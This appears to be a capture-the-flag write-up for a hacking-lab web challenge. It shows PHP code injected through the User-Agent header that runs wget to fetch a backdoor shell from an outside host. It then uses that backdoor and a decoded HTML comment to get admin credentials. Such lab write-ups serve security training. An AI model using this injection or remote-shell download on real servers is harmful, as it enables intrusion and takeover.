8026_owasp_9

enter random content into the form and set the user agent to <?system("wget http://www.really_nasty_hacker.com/shell.txt");?> to execute the php code and download the backdoor (see 8026_1.png and 8026_2.png)

access the backdoor http://hackademics.hacking-lab.com/ch009/y0_man_y0.php

list the content of the current directory: ls

index.php
adminpanel.php
y0_man_y0.php
log.history.php

access http://hackademics.hacking-lab.com/ch009/adminpanel.php -> prompt for credentials
- inspect source -> no information

access http://hackademics.hacking-lab.com/ch009/log.history.php -> not found

inspect source -> html comment:

<!-- &#115;&#108;&#114;&#105;&#103;&#95;&#36;&#36;&#97;&#112;&#95;&#36;&#71;&#78;&#48;&#82;&#84;&#83;&#95;&#52;&#95;&#115;&#49;&#95;&#115;&#49;&#72;&#116;&#32;&#58;&#100;&#114;
&#111;&#119;&#115;&#115;&#97;&#112;&#32;&#110;&#105;&#109;&#100;&#97;&#32;&#58;&#101;&#109;&#97;&#110;&#114;&#101;&#115;&#117; -->

decoded: 
inverted:

use the credentials to log in on adminpanel.php (see 8026_3.png)

username: admin
password tH1s_1s_4_STR0NG\(_pa\)$_girls